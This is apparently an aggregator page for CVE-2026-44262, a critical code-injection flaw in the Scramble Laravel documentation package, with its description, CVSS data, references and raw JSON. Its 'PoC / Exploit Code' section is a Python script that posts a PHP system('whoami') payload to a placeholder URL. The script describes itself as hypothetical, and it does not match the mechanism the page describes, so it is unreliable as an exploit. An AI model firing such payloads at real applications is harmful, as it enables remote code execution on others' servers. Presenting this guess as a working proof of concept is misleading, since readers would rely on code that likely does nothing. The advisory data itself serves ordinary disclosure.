Security Vulnerability Report
CVE-2026-44262 CVSS 9.4 CRITICAL

CVE-2026-44262

Published: 2026-05-12 22:16:37
Last Modified: 2026-05-12 22:16:37

Description

Scramble generates API documentation for Laravel projects. In versions from 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation rules reference user-controlled input, request-supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context. This vulnerability is fixed in 0.13.22.

CVSS Details

CVSS Score: 9.4
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

dedoc/scramble >= 0.13.2, < 0.13.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests

# Target URL (vulnerable endpoint)
target_url = "http://vulnerable-app.com/api/test"

# Hypothetical payload exploiting the validation rule evaluation
# Assuming the backend uses request()->input('rule') in validation
payload = {
    "input_field": "some_value",
    "malicious_rule": "<?php system('whoami'); ?>",
}

try:
    response = requests.post(target_url, data=payload)
    print(f"Request sent to {target_url}")
    print("If the documentation generation is triggered, the code may execute.")
    print("Response status:", response.status_code)
except Exception as e:
    print(f"Error: {e}")

References

https://github.com/dedoc/scramble/releases/tag/v0.13.22
https://github.com/dedoc/scramble/security/advisories/GHSA-4rm2-28vj-fj39

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44262", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:36.563", "lastModified": "2026-05-12T22:16:36.563", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Scramble generates API documentation for Laravel project. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context. This vulnerability is fixed in 0.13.22."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/dedoc/scramble/releases/tag/v0.13.22", "source": "[email protected]"}, {"url": "https://github.com/dedoc/scramble/security/advisories/GHSA-4rm2-28vj-fj39", "source": "[email protected]"}]}}